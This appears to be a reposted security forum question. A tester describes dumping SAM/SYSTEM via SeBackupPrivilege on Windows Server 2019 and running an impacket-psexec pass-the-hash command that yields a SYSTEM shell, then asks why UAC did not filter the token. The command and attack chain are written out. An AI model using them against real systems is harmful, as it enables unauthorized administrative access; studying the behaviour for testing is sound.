• caglararli@hotmail.com
  • 05386281520

Pass-the-hash, why do I get a shell with high integrity?

Çağlar Arlı      -    22 Views

Pass-the-hash, why do I get a shell with high integrity?

I am testing the security of a Windows Server 2019 machine and have a question about remote access to the machine.

The user on the machine has the permission "SeBackupPrivilege". I can therefore dump the "Administrator" user's SAM and SYSTEM.

whoami /all
    ...
    SeBackupPrivilege             Back up files and directories  Disabled
    ...

I then used the Administrator user's NTHash with PsExec to do a pass-the-hash attack. After doing this attack I get a shell with high integrity.

impacket-psexec -hashes :[NTHASH_HERE] administrator@10.10.10.10

        C:\Windows\system32> whoami
            nt authority\system

My question is, why do I get a shell with high integrity? Shouldn't UAC prevent this behavior? I would expect a shell with low integrity, given these settings as well:

UAC is enabled:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
        ConsentPromptBehaviorAdmin    REG_DWORD    0x5

LocalAccountTokenFilterPolicy is the default value:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy
        ERROR: The system was unable to find the specified registry key or value.
    
    

FilterAdministratorToken is the default value:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken
    ERROR: The system was unable to find the specified registry key or value.
    
    
    

To anyone who can clarify this doubt for me...thank you.